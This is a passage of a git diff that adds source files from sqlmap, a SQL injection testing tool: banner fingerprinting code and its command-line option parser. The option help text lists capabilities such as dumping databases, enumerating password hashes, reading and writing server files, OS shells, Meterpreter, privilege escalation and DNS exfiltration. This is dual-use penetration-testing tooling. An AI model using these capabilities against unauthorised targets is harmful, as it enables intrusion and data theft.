"something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + except StopIteration: + self.adjust() + retVal = next(self.iter).rstrip() + if not self.proc_count or self.counter % self.proc_count == self.proc_id: + break + return retVal + + def rewind(self): + self.index = 0 + self.adjust() diff --git a/src/sqlmap-master/lib/parse/__init__.py b/src/sqlmap-master/lib/parse/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/lib/parse/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/lib/parse/banner.py b/src/sqlmap-master/lib/parse/banner.py new file mode 100644 index 0000000..0143bea --- /dev/null +++ b/src/sqlmap-master/lib/parse/banner.py @@ -0,0 +1,115 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from xml.sax.handler import ContentHandler + +from lib.core.common import Backend +from lib.core.common import parseXmlFile +from lib.core.common import sanitizeStr +from lib.core.data import kb +from lib.core.data import paths +from lib.core.enums import DBMS +from lib.parse.handler import FingerprintHandler + +class MSSQLBannerHandler(ContentHandler): + """ + This class defines methods to parse and extract information from the + given Microsoft SQL Server banner based upon the data in XML file + """ + + def __init__(self, banner, info): + ContentHandler.__init__(self) + + self._banner = sanitizeStr(banner or "") + self._inVersion = False + self._inServicePack = False + self._release = None + self._version = "" + self._versionAlt = None + self._servicePack = "" + self._info = info + + def _feedInfo(self, key, value): + value = sanitizeStr(value) + + if value in (None, "None"): + return + + self._info[key] = value + + def startElement(self, name, attrs): + if name == "signatures": + self._release = sanitizeStr(attrs.get("release")) + + elif name == "version": + self._inVersion = True + + elif name == "servicepack": + self._inServicePack = True + + def characters(self, content): + if self._inVersion: + self._version += sanitizeStr(content) + elif self._inServicePack: + self._servicePack += sanitizeStr(content) + + def endElement(self, name): + if name == "signature": + for version in (self._version, self._versionAlt): + if version and self._banner and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner): + self._feedInfo("dbmsRelease", self._release) + self._feedInfo("dbmsVersion", self._version) + self._feedInfo("dbmsServicePack", self._servicePack) + break + + self._version = "" + self._versionAlt = None + self._servicePack = "" + + elif name == "version": + self._inVersion = False + self._version = self._version.replace(" ", "") + + match = re.search(r"\A(?P\d+)\.00\.(?P\d+)\Z", self._version) + self._versionAlt = "%s.0.%s.0" % (match.group('major'), match.group('build')) if match else None + + elif name == "servicepack": + self._inServicePack = False + self._servicePack = self._servicePack.replace(" ", "") + +def bannerParser(banner): + """ + This function calls a class to extract information from the given + DBMS banner based upon the data in XML file + """ + + xmlfile = None + + if Backend.isDbms(DBMS.MSSQL): + xmlfile = paths.MSSQL_XML + elif Backend.isDbms(DBMS.MYSQL): + xmlfile = paths.MYSQL_XML + elif Backend.isDbms(DBMS.ORACLE): + xmlfile = paths.ORACLE_XML + elif Backend.isDbms(DBMS.PGSQL): + xmlfile = paths.PGSQL_XML + + if not xmlfile: + return + + if Backend.isDbms(DBMS.MSSQL): + handler = MSSQLBannerHandler(banner, kb.bannerFp) + parseXmlFile(xmlfile, handler) + + handler = FingerprintHandler(banner, kb.bannerFp) + parseXmlFile(paths.GENERIC_XML, handler) + else: + handler = FingerprintHandler(banner, kb.bannerFp) + parseXmlFile(xmlfile, handler) + parseXmlFile(paths.GENERIC_XML, handler) diff --git a/src/sqlmap-master/lib/parse/cmdline.py b/src/sqlmap-master/lib/parse/cmdline.py new file mode 100644 index 0000000..104bc36 --- /dev/null +++ b/src/sqlmap-master/lib/parse/cmdline.py @@ -0,0 +1,1119 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import os +import re +import shlex +import sys + +try: + from optparse import OptionError as ArgumentError + from optparse import OptionGroup + from optparse import OptionParser as ArgumentParser + from optparse import SUPPRESS_HELP as SUPPRESS + + ArgumentParser.add_argument = ArgumentParser.add_option + + def _add_argument_group(self, *args, **kwargs): + return self.add_option_group(OptionGroup(self, *args, **kwargs)) + + ArgumentParser.add_argument_group = _add_argument_group + + def _add_argument(self, *args, **kwargs): + return self.add_option(*args, **kwargs) + + OptionGroup.add_argument = _add_argument + +except ImportError: + from argparse import ArgumentParser + from argparse import ArgumentError + from argparse import SUPPRESS + +finally: + def get_actions(instance): + for attr in ("option_list", "_group_actions", "_actions"): + if hasattr(instance, attr): + return getattr(instance, attr) + + def get_groups(parser): + return getattr(parser, "option_groups", None) or getattr(parser, "_action_groups") + + def get_all_options(parser): + retVal = set() + + for option in get_actions(parser): + if hasattr(option, "option_strings"): + retVal.update(option.option_strings) + else: + retVal.update(option._long_opts) + retVal.update(option._short_opts) + + for group in get_groups(parser): + for option in get_actions(group): + if hasattr(option, "option_strings"): + retVal.update(option.option_strings) + else: + retVal.update(option._long_opts) + retVal.update(option._short_opts) + + return retVal + +from lib.core.common import checkOldOptions +from lib.core.common import checkSystemEncoding +from lib.core.common import dataToStdout +from lib.core.common import expandMnemonics +from lib.core.common import getSafeExString +from lib.core.compat import xrange +from lib.core.convert import getUnicode +from lib.core.data import cmdLineOptions +from lib.core.data import conf +from lib.core.data import logger +from lib.core.defaults import defaults +from lib.core.dicts import DEPRECATED_OPTIONS +from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.exception import SqlmapShellQuitException +from lib.core.exception import SqlmapSilentQuitException +from lib.core.exception import SqlmapSyntaxException +from lib.core.option import _createHomeDirectories +from lib.core.settings import BASIC_HELP_ITEMS +from lib.core.settings import DUMMY_URL +from lib.core.settings import IGNORED_OPTIONS +from lib.core.settings import INFERENCE_UNKNOWN_CHAR +from lib.core.settings import IS_WIN +from lib.core.settings import MAX_HELP_OPTION_LENGTH +from lib.core.settings import VERSION_STRING +from lib.core.shell import autoCompletion +from lib.core.shell import clearHistory +from lib.core.shell import loadHistory +from lib.core.shell import saveHistory +from thirdparty.six.moves import input as _input + +def cmdLineParser(argv=None): + """ + This function parses the command line parameters and arguments + """ + + if not argv: + argv = sys.argv + + checkSystemEncoding() + + # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") + _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding) + + usage = "%s%s [options]" % ("%s " % os.path.basename(sys.executable) if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _) + parser = ArgumentParser(usage=usage) + + try: + parser.add_argument("--hh", dest="advancedHelp", action="store_true", + help="Show advanced help message and exit") + + parser.add_argument("--version", dest="showVersion", action="store_true", + help="Show program's version number and exit") + + parser.add_argument("-v", dest="verbose", type=int, + help="Verbosity level: 0-6 (default %d)" % defaults.verbose) + + # Target options + target = parser.add_argument_group("Target", "At least one of these options has to be provided to define the target(s)") + + target.add_argument("-u", "--url", dest="url", + help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")") + + target.add_argument("-d", dest="direct", + help="Connection string for direct database connection") + + target.add_argument("-l", dest="logFile", + help="Parse target(s) from Burp or WebScarab proxy log file") + + target.add_argument("-m", dest="bulkFile", + help="Scan multiple targets given in a textual file ") + + target.add_argument("-r", dest="requestFile", + help="Load HTTP request from a file") + + target.add_argument("-g", dest="googleDork", + help="Process Google dork results as target URLs") + + target.add_argument("-c", dest="configFile", + help="Load options from a configuration INI file") + + # Request options + request = parser.add_argument_group("Request", "These options can be used to specify how to connect to the target URL") + + request.add_argument("-A", "--user-agent", dest="agent", + help="HTTP User-Agent header value") + + request.add_argument("-H", "--header", dest="header", + help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")") + + request.add_argument("--method", dest="method", + help="Force usage of given HTTP method (e.g. PUT)") + + request.add_argument("--data", dest="data", + help="Data string to be sent through POST (e.g. \"id=1\")") + + request.add_argument("--param-del", dest="paramDel", + help="Character used for splitting parameter values (e.g. &)") + + request.add_argument("--cookie", dest="cookie", + help="HTTP Cookie header value (e.g. \"PHPSESSID=a8d127e..\")") + + request.add_argument("--cookie-del", dest="cookieDel", + help="Character used for splitting cookie values (e.g. ;)") + + request.add_argument("--live-cookies", dest="liveCookies", + help="Live cookies file used for loading up-to-date values") + + request.add_argument("--load-cookies", dest="loadCookies", + help="File containing cookies in Netscape/wget format") + + request.add_argument("--drop-set-cookie", dest="dropSetCookie", action="store_true", + help="Ignore Set-Cookie header from response") + + request.add_argument("--mobile", dest="mobile", action="store_true", + help="Imitate smartphone through HTTP User-Agent header") + + request.add_argument("--random-agent", dest="randomAgent", action="store_true", + help="Use randomly selected HTTP User-Agent header value") + + request.add_argument("--host", dest="host", + help="HTTP Host header value") + + request.add_argument("--referer", dest="referer", + help="HTTP Referer header value") + + request.add_argument("--headers", dest="headers", + help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") + + request.add_argument("--auth-type", dest="authType", + help="HTTP authentication type (Basic, Digest, Bearer, ...)") + + request.add_argument("--auth-cred", dest="authCred", + help="HTTP authentication credentials (name:password)") + + request.add_argument("--auth-file", dest="authFile", + help="HTTP authentication PEM cert/private key file") + + request.add_argument("--abort-code", dest="abortCode", + help="Abort on (problematic) HTTP error code(s) (e.g. 401)") + + request.add_argument("--ignore-code", dest="ignoreCode", + help="Ignore (problematic) HTTP error code(s) (e.g. 401)") + + request.add_argument("--ignore-proxy", dest="ignoreProxy", action="store_true", + help="Ignore system default proxy settings") + + request.add_argument("--ignore-redirects", dest="ignoreRedirects", action="store_true", + help="Ignore redirection attempts") + + request.add_argument("--ignore-timeouts", dest="ignoreTimeouts", action="store_true", + help="Ignore connection timeouts") + + request.add_argument("--proxy", dest="proxy", + help="Use a proxy to connect to the target URL") + + request.add_argument("--proxy-cred", dest="proxyCred", + help="Proxy authentication credentials (name:password)") + + request.add_argument("--proxy-file", dest="proxyFile", + help="Load proxy list from a file") + + request.add_argument("--proxy-freq", dest="proxyFreq", type=int, + help="Requests between change of proxy from a given list") + + request.add_argument("--tor", dest="tor", action="store_true", + help="Use Tor anonymity network") + + request.add_argument("--tor-port", dest="torPort", + help="Set Tor proxy port other than default") + + request.add_argument("--tor-type", dest="torType", + help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") + + request.add_argument("--check-tor", dest="checkTor", action="store_true", + help="Check to see if Tor is used properly") + + request.add_argument("--delay", dest="delay", type=float, + help="Delay in seconds between each HTTP request") + + request.add_argument("--timeout", dest="timeout", type=float, + help="Seconds to wait before timeout connection (default %d)" % defaults.timeout) + + request.add_argument("--retries", dest="retries", type=int, + help="Retries when the connection timeouts (default %d)" % defaults.retries) + + request.add_argument("--retry-on", dest="retryOn", + help="Retry request on regexp matching content (e.g. \"drop\")") + + request.add_argument("--randomize", dest="rParam", + help="Randomly change value for given parameter(s)") + + request.add_argument("--safe-url", dest="safeUrl", + help="URL address to visit frequently during testing") + + request.add_argument("--safe-post", dest="safePost", + help="POST data to send to a safe URL") + + request.add_argument("--safe-req", dest="safeReqFile", + help="Load safe HTTP request from a file") + + request.add_argument("--safe-freq", dest="safeFreq", type=int, + help="Regular requests between visits to a safe URL") + + request.add_argument("--skip-urlencode", dest="skipUrlEncode", action="store_true", + help="Skip URL encoding of payload data") + + request.add_argument("--csrf-token", dest="csrfToken", + help="Parameter used to hold anti-CSRF token") + + request.add_argument("--csrf-url", dest="csrfUrl", + help="URL address to visit for extraction of anti-CSRF token") + + request.add_argument("--csrf-method", dest="csrfMethod", + help="HTTP method to use during anti-CSRF token page visit") + + request.add_argument("--csrf-data", dest="csrfData", + help="POST data to send during anti-CSRF token page visit") + + request.add_argument("--csrf-retries", dest="csrfRetries", type=int, + help="Retries for anti-CSRF token retrieval (default %d)" % defaults.csrfRetries) + + request.add_argument("--force-ssl", dest="forceSSL", action="store_true", + help="Force usage of SSL/HTTPS") + + request.add_argument("--chunked", dest="chunked", action="store_true", + help="Use HTTP chunked transfer encoded (POST) requests") + + request.add_argument("--hpp", dest="hpp", action="store_true", + help="Use HTTP parameter pollution method") + + request.add_argument("--eval", dest="evalCode", + help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")") + + # Optimization options + optimization = parser.add_argument_group("Optimization", "These options can be used to optimize the performance of sqlmap") + + optimization.add_argument("-o", dest="optimize", action="store_true", + help="Turn on all optimization switches") + + optimization.add_argument("--predict-output", dest="predictOutput", action="store_true", + help="Predict common queries output") + + optimization.add_argument("--keep-alive", dest="keepAlive", action="store_true", + help="Use persistent HTTP(s) connections") + + optimization.add_argument("--null-connection", dest="nullConnection", action="store_true", + help="Retrieve page length without actual HTTP response body") + + optimization.add_argument("--threads", dest="threads", type=int, + help="Max number of concurrent HTTP(s) requests (default %d)" % defaults.threads) + + # Injection options + injection = parser.add_argument_group("Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts") + + injection.add_argument("-p", dest="testParameter", + help="Testable parameter(s)") + + injection.add_argument("--skip", dest="skip", + help="Skip testing for given parameter(s)") + + injection.add_argument("--skip-static", dest="skipStatic", action="store_true", + help="Skip testing parameters that not appear to be dynamic") + + injection.add_argument("--param-exclude", dest="paramExclude", + help="Regexp to exclude parameters from testing (e.g. \"ses\")") + + injection.add_argument("--param-filter", dest="paramFilter", + help="Select testable parameter(s) by place (e.g. \"POST\")") + + injection.add_argument("--dbms", dest="dbms", + help="Force back-end DBMS to provided value") + + injection.add_argument("--dbms-cred", dest="dbmsCred", + help="DBMS authentication credentials (user:password)") + + injection.add_argument("--os", dest="os", + help="Force back-end DBMS operating system to provided value") + + injection.add_argument("--invalid-bignum", dest="invalidBignum", action="store_true", + help="Use big numbers for invalidating values") + + injection.add_argument("--invalid-logical", dest="invalidLogical", action="store_true", + help="Use logical operations for invalidating values") + + injection.add_argument("--invalid-string", dest="invalidString", action="store_true", + help="Use random strings for invalidating values") + + injection.add_argument("--no-cast", dest="noCast", action="store_true", + help="Turn off payload casting mechanism") + + injection.add_argument("--no-escape", dest="noEscape", action="store_true", + help="Turn off string escaping mechanism") + + injection.add_argument("--prefix", dest="prefix", + help="Injection payload prefix string") + + injection.add_argument("--suffix", dest="suffix", + help="Injection payload suffix string") + + injection.add_argument("--tamper", dest="tamper", + help="Use given script(s) for tampering injection data") + + # Detection options + detection = parser.add_argument_group("Detection", "These options can be used to customize the detection phase") + + detection.add_argument("--level", dest="level", type=int, + help="Level of tests to perform (1-5, default %d)" % defaults.level) + + detection.add_argument("--risk", dest="risk", type=int, + help="Risk of tests to perform (1-3, default %d)" % defaults.risk) + + detection.add_argument("--string", dest="string", + help="String to match when query is evaluated to True") + + detection.add_argument("--not-string", dest="notString", + help="String to match when query is evaluated to False") + + detection.add_argument("--regexp", dest="regexp", + help="Regexp to match when query is evaluated to True") + + detection.add_argument("--code", dest="code", type=int, + help="HTTP code to match when query is evaluated to True") + + detection.add_argument("--smart", dest="smart", action="store_true", + help="Perform thorough tests only if positive heuristic(s)") + + detection.add_argument("--text-only", dest="textOnly", action="store_true", + help="Compare pages based only on the textual content") + + detection.add_argument("--titles", dest="titles", action="store_true", + help="Compare pages based only on their titles") + + # Techniques options + techniques = parser.add_argument_group("Techniques", "These options can be used to tweak testing of specific SQL injection techniques") + + techniques.add_argument("--technique", dest="technique", + help="SQL injection techniques to use (default \"%s\")" % defaults.technique) + + techniques.add_argument("--time-sec", dest="timeSec", type=int, + help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec) + + techniques.add_argument("--union-cols", dest="uCols", + help="Range of columns to test for UNION query SQL injection") + + techniques.add_argument("--union-char", dest="uChar", + help="Character to use for bruteforcing number of columns") + + techniques.add_argument("--union-from", dest="uFrom", + help="Table to use in FROM part of UNION query SQL injection") + + techniques.add_argument("--union-values", dest="uValues", + help="Column values to use for UNION query SQL injection") + + techniques.add_argument("--dns-domain", dest="dnsDomain", + help="Domain name used for DNS exfiltration attack") + + techniques.add_argument("--second-url", dest="secondUrl", + help="Resulting page URL searched for second-order response") + + techniques.add_argument("--second-req", dest="secondReq", + help="Load second-order HTTP request from file") + + # Fingerprint options + fingerprint = parser.add_argument_group("Fingerprint") + + fingerprint.add_argument("-f", "--fingerprint", dest="extensiveFp", action="store_true", + help="Perform an extensive DBMS version fingerprint") + + # Enumeration options + enumeration = parser.add_argument_group("Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables") + + enumeration.add_argument("-a", "--all", dest="getAll", action="store_true", + help="Retrieve everything") + + enumeration.add_argument("-b", "--banner", dest="getBanner", action="store_true", + help="Retrieve DBMS banner") + + enumeration.add_argument("--current-user", dest="getCurrentUser", action="store_true", + help="Retrieve DBMS current user") + + enumeration.add_argument("--current-db", dest="getCurrentDb", action="store_true", + help="Retrieve DBMS current database") + + enumeration.add_argument("--hostname", dest="getHostname", action="store_true", + help="Retrieve DBMS server hostname") + + enumeration.add_argument("--is-dba", dest="isDba", action="store_true", + help="Detect if the DBMS current user is DBA") + + enumeration.add_argument("--users", dest="getUsers", action="store_true", + help="Enumerate DBMS users") + + enumeration.add_argument("--passwords", dest="getPasswordHashes", action="store_true", + help="Enumerate DBMS users password hashes") + + enumeration.add_argument("--privileges", dest="getPrivileges", action="store_true", + help="Enumerate DBMS users privileges") + + enumeration.add_argument("--roles", dest="getRoles", action="store_true", + help="Enumerate DBMS users roles") + + enumeration.add_argument("--dbs", dest="getDbs", action="store_true", + help="Enumerate DBMS databases") + + enumeration.add_argument("--tables", dest="getTables", action="store_true", + help="Enumerate DBMS database tables") + + enumeration.add_argument("--columns", dest="getColumns", action="store_true", + help="Enumerate DBMS database table columns") + + enumeration.add_argument("--schema", dest="getSchema", action="store_true", + help="Enumerate DBMS schema") + + enumeration.add_argument("--count", dest="getCount", action="store_true", + help="Retrieve number of entries for table(s)") + + enumeration.add_argument("--dump", dest="dumpTable", action="store_true", + help="Dump DBMS database table entries") + + enumeration.add_argument("--dump-all", dest="dumpAll", action="store_true", + help="Dump all DBMS databases tables entries") + + enumeration.add_argument("--search", dest="search", action="store_true", + help="Search column(s), table(s) and/or database name(s)") + + enumeration.add_argument("--comments", dest="getComments", action="store_true", + help="Check for DBMS comments during enumeration") + + enumeration.add_argument("--statements", dest="getStatements", action="store_true", + help="Retrieve SQL statements being run on DBMS") + + enumeration.add_argument("-D", dest="db", + help="DBMS database to enumerate") + + enumeration.add_argument("-T", dest="tbl", + help="DBMS database table(s) to enumerate") + + enumeration.add_argument("-C", dest="col", + help="DBMS database table column(s) to enumerate") + + enumeration.add_argument("-X", dest="exclude", + help="DBMS database identifier(s) to not enumerate") + + enumeration.add_argument("-U", dest="user", + help="DBMS user to enumerate") + + enumeration.add_argument("--exclude-sysdbs", dest="excludeSysDbs", action="store_true", + help="Exclude DBMS system databases when enumerating tables") + + enumeration.add_argument("--pivot-column", dest="pivotColumn", + help="Pivot column name") + + enumeration.add_argument("--where", dest="dumpWhere", + help="Use WHERE condition while table dumping") + + enumeration.add_argument("--start", dest="limitStart", type=int, + help="First dump table entry to retrieve") + + enumeration.add_argument("--stop", dest="limitStop", type=int, + help="Last dump table entry to retrieve") + + enumeration.add_argument("--first", dest="firstChar", type=int, + help="First query output word character to retrieve") + + enumeration.add_argument("--last", dest="lastChar", type=int, + help="Last query output word character to retrieve") + + enumeration.add_argument("--sql-query", dest="sqlQuery", + help="SQL statement to be executed") + + enumeration.add_argument("--sql-shell", dest="sqlShell", action="store_true", + help="Prompt for an interactive SQL shell") + + enumeration.add_argument("--sql-file", dest="sqlFile", + help="Execute SQL statements from given file(s)") + + # Brute force options + brute = parser.add_argument_group("Brute force", "These options can be used to run brute force checks") + + brute.add_argument("--common-tables", dest="commonTables", action="store_true", + help="Check existence of common tables") + + brute.add_argument("--common-columns", dest="commonColumns", action="store_true", + help="Check existence of common columns") + + brute.add_argument("--common-files", dest="commonFiles", action="store_true", + help="Check existence of common files") + + # User-defined function options + udf = parser.add_argument_group("User-defined function injection", "These options can be used to create custom user-defined functions") + + udf.add_argument("--udf-inject", dest="udfInject", action="store_true", + help="Inject custom user-defined functions") + + udf.add_argument("--shared-lib", dest="shLib", + help="Local path of the shared library") + + # File system options + filesystem = parser.add_argument_group("File system access", "These options can be used to access the back-end database management system underlying file system") + + filesystem.add_argument("--file-read", dest="fileRead", + help="Read a file from the back-end DBMS file system") + + filesystem.add_argument("--file-write", dest="fileWrite", + help="Write a local file on the back-end DBMS file system") + + filesystem.add_argument("--file-dest", dest="fileDest", + help="Back-end DBMS absolute filepath to write to") + + # Takeover options + takeover = parser.add_argument_group("Operating system access", "These options can be used to access the back-end database management system underlying operating system") + + takeover.add_argument("--os-cmd", dest="osCmd", + help="Execute an operating system command") + + takeover.add_argument("--os-shell", dest="osShell", action="store_true", + help="Prompt for an interactive operating system shell") + + takeover.add_argument("--os-pwn", dest="osPwn", action="store_true", + help="Prompt for an OOB shell, Meterpreter or VNC") + + takeover.add_argument("--os-smbrelay", dest="osSmb", action="store_true", + help="One click prompt for an OOB shell, Meterpreter or VNC") + + takeover.add_argument("--os-bof", dest="osBof", action="store_true", + help="Stored procedure buffer overflow " + "exploitation") + + takeover.add_argument("--priv-esc", dest="privEsc", action="store_true", + help="Database process user privilege escalation") + + takeover.add_argument("--msf-path", dest="msfPath", + help="Local path where Metasploit Framework is installed") + + takeover.add_argument("--tmp-path", dest="tmpPath", + help="Remote absolute path of temporary files directory") + + # Windows registry options + windows = parser.add_argument_group("Windows registry access", "These options can be used to access the back-end database management system Windows registry") + + windows.add_argument("--reg-read", dest="regRead", action="store_true", + help="Read a Windows registry key value") + + windows.add_argument("--reg-add", dest="regAdd", action="store_true", + help="Write a Windows registry key value data") + + windows.add_argument("--reg-del", dest="regDel", action="store_true", + help="Delete a Windows registry key value") + + windows.add_argument("--reg-key", dest="regKey", + help="Windows registry key") + + windows.add_argument("--reg-value", dest="regVal", + help="Windows registry key value") + + windows.add_argument("--reg-data", dest="regData", + help="Windows registry key value data") + + windows.add_argument("--reg-type", dest="regType", + help="Windows registry key value type") + + # General options + general = parser.add_argument_group("General", "These options can be used to set some general working parameters") + + general.add_argument("-s", dest="sessionFile", + help="Load session from a stored (.sqlite) file") + + general.add_argument("-t", dest="trafficFile", + help="Log all HTTP traffic into a textual file") + + general.add_argument("--abort-on-empty", dest="abortOnEmpty", action="store_true", + help="Abort data retrieval on empty results") + + general.add_argument("--answers", dest="answers", + help="Set predefined answers (e.g. \"quit=N,follow=N\")") + + general.add_argument("--base64", dest="base64Parameter", + help="Parameter(s) containing Base64 encoded data") + + general.add_argument("--base64-safe", dest="base64Safe", action="store_true", + help="Use URL and filename safe Base64 alphabet (RFC 4648)") + + general.add_argument("--batch", dest="batch", action="store_true", + help="Never ask for user input, use the default behavior") + + general.add_argument("--binary-fields", dest="binaryFields", + help="Result fields having binary values (e.g. \"digest\")") + + general.add_argument("--check-internet", dest="checkInternet", action="store_true", + help="Check Internet connection before assessing the target") + + general.add_argument("--cleanup", dest="cleanup", action="store_true", + help="Clean up the DBMS from sqlmap specific UDF and tables") + + general.add_argument("--crawl", dest="crawlDepth", type=int, + help="Crawl the website starting from the target URL") + + general.add_argument("--crawl-exclude", dest="crawlExclude", + help="Regexp to exclude pages from crawling (e.g. \"logout\")") + + general.add_argument("--csv-del", dest="csvDel", + help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel) + + general.add_argument("--charset", dest="charset", + help="Blind SQL injection charset (e.g. \"0123456789abcdef\")") + + general.add_argument("--dump-file", dest="dumpFile", + help="Store dumped data to a custom file") + + general.add_argument("--dump-format", dest="dumpFormat", + help="Format of dumped data (CSV (default), HTML or SQLITE)") + + general.add_argument("--encoding", dest="encoding", + help="Character encoding used for data retrieval (e.g. GBK)") + + general.add_argument("--eta", dest="eta", action="store_true", + help="Display for each output the estimated time of arrival") + + general.add_argument("--flush-session", dest="flushSession", action="store_true", + help="Flush session files for current target") + + general.add_argument("--forms", dest="forms", action="store_true", + help="Parse and test forms on target URL") + + general.add_argument("--fresh-queries", dest="freshQueries", action="store_true", + help="Ignore query results stored in session file") + + general.add_argument("--gpage", dest="googlePage", type=int, + help="Use Google dork results from specified page number") + + general.add_argument("--har", dest="harFile", + help="Log all HTTP traffic into a HAR file") + + general.add_argument("--hex", dest="hexConvert", action="store_true", + help="Use hex conversion during data retrieval") + + general.add_argument("--output-dir", dest="outputDir", action="store", + help="Custom output directory path") + + general.add_argument("--parse-errors", dest="parseErrors", action="store_true", + help="Parse and display DBMS error messages from responses") + + general.add_argument("--preprocess", dest="preprocess", + help="Use given script(s) for preprocessing (request)") + + general.add_argument("--postprocess", dest="postprocess", + help="Use given script(s) for postprocessing (response)") + + general.add_argument("--repair", dest="repair", action="store_true", + help="Redump entries having unknown character marker (%s)" % INFERENCE_UNKNOWN_CHAR) + + general.add_argument("--save", dest="saveConfig", + help="Save options to a configuration INI file") + + general.add_argument("--scope", dest="scope", + help="Regexp for filtering targets") + + general.add_argument("--skip-heuristics", dest="skipHeuristics", action="store_true", + help="Skip heuristic detection of vulnerabilities") + + general.add_argument("--skip-waf", dest="skipWaf", action="store_true", + help="Skip heuristic detection of WAF/IPS protection") + + general.add_argument("--table-prefix", dest="tablePrefix", + help="Prefix used for temporary tables (default: \"%s\")" % defaults.tablePrefix) + + general.add_argument("--test-filter", dest="testFilter", + help="Select tests by payloads and/or titles (e.g. ROW)") + + general.add_argument("--test-skip", dest="testSkip", + help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") + + general.add_argument("--time-limit", dest="timeLimit", type=float, + help="Run with a time limit in seconds (e.g. 3600)") + + general.add_argument("--unsafe-naming", dest="unsafeNaming", action="store_true", + help="Disable escaping of DBMS identifiers (e.g. \"user\")") + + general.add_argument("--web-root", dest="webRoot", + help="Web server document root directory (e.g. \"/var/www\")") + + # Miscellaneous options + miscellaneous = parser.add_argument_group("Miscellaneous", "These options do not fit into any other category") + + miscellaneous.add_argument("-z", dest="mnemonics", + help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") + + miscellaneous.add_argument("--alert", dest="alert", + help="Run host OS command(s) when SQL injection is found") + + miscellaneous.add_argument("--beep", dest="beep", action="store_true", + help="Beep on question and/or when vulnerability is found") + + miscellaneous.add_argument("--dependencies", dest="dependencies", action="store_true", + help="Check for missing (optional) sqlmap dependencies") + + miscellaneous.add_argument("--disable-coloring", dest="disableColoring", action="store_true", + help="Disable console output coloring") + + miscellaneous.add_argument("--list-tampers", dest="listTampers", action="store_true", + help="Display list of available tamper scripts") + + miscellaneous.add_argument("--no-logging", dest="noLogging", action="store_true", + help="Disable logging to a file") + + miscellaneous.add_argument("--offline", dest="offline", action="store_true", + help="Work in offline mode (only use session data)") + + miscellaneous.add_argument("--purge", dest="purge", action="store_true", + help="Safely remove all content from sqlmap data directory") + + miscellaneous.add_argument("--results-file", dest="resultsFile", + help="Location of CSV results file in multiple targets mode") + + miscellaneous.add_argument("--shell", dest="shell", action="store_true", + help="Prompt for an interactive sqlmap shell") + + miscellaneous.add_argument("--tmp-dir", dest="tmpDir", + help="Local directory for storing temporary files") + + miscellaneous.add_argument("--unstable", dest="unstable", action="store_true", + help="Adjust options for unstable connections") + + miscellaneous.add_argument("--update", dest="updateAll", action="store_true", + help="Update sqlmap") + + miscellaneous.add_argument("--wizard", dest="wizard", action="store_true", + help="Simple wizard interface for beginner users") + + # Hidden and/or experimental options + parser.add_argument("--crack", dest="hashFile", + help=SUPPRESS) # "Load and crack hashes from a file (standalone)" + + parser.add_argument("--dummy", dest="dummy", action="store_true", + help=SUPPRESS) + + parser.add_argument("--yuge", dest="yuge", action="store_true", + help=SUPPRESS) + + parser.add_argument("--murphy-rate", dest="murphyRate", type=int, + help=SUPPRESS) + + parser.add_argument("--debug", dest="debug", action="store_true", + help=SUPPRESS) + + parser.add_argument("--deprecations", dest="deprecations", action="store_true", + help=SUPPRESS) + + parser.add_argument("--disable-multi", dest="disableMulti", action="store_true", + help=SUPPRESS) + + parser.add_argument("--disable-precon", dest="disablePrecon", action="store_true", + help=SUPPRESS) + + parser.add_argument("--disable-stats", dest="disableStats", action="store_true", + help=SUPPRESS) + + parser.add_argument("--profile", dest="profile", action="store_true", + help=SUPPRESS) + + parser.add_argument("--localhost", dest="localhost", action="store_true", + help=SUPPRESS) + + parser.add_argument("--force-dbms", dest="forceDbms", + help=SUPPRESS) + + parser.add_argument("--force-dns", dest="forceDns", action="store_true", + help=SUPPRESS) + + parser.add_argument("--force-partial", dest="forcePartial", action="store_true", + help=SUPPRESS) + + parser.add_argument("--force-pivoting", dest="forcePivoting", action="store_true", + help=SUPPRESS) + + parser.add_argument("--ignore-stdin", dest="ignoreStdin", action="store_true", + help=SUPPRESS) + + parser.add_argument("--non-interactive", dest="nonInteractive", action="store_true", + help=SUPPRESS) + + parser.add_argument("--gui", dest="gui", action="store_true", + help=SUPPRESS) + + parser.add_argument("--smoke-test", dest="smokeTest", action="store_true", + help=SUPPRESS) + + parser.add_argument("--vuln-test", dest="vulnTest", action="store_true", + help=SUPPRESS) + + parser.add_argument("--disable-json", dest="disableJson", action="store_true", + help=SUPPRESS) + + # API options + parser.add_argument("--api", dest="api", action="store_true", + help=SUPPRESS) + + parser.add_argument("--taskid", dest="taskid", + help=SUPPRESS) + + parser.add_argument("--database", dest="database", + help=SUPPRESS) + + # Dirty hack to display longer options without breaking into two lines + if hasattr(parser, "formatter"): + def _(self, *args): + retVal = parser.formatter._format_option_strings(*args) + if len(retVal) > MAX_HELP_OPTION_LENGTH: + retVal = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - 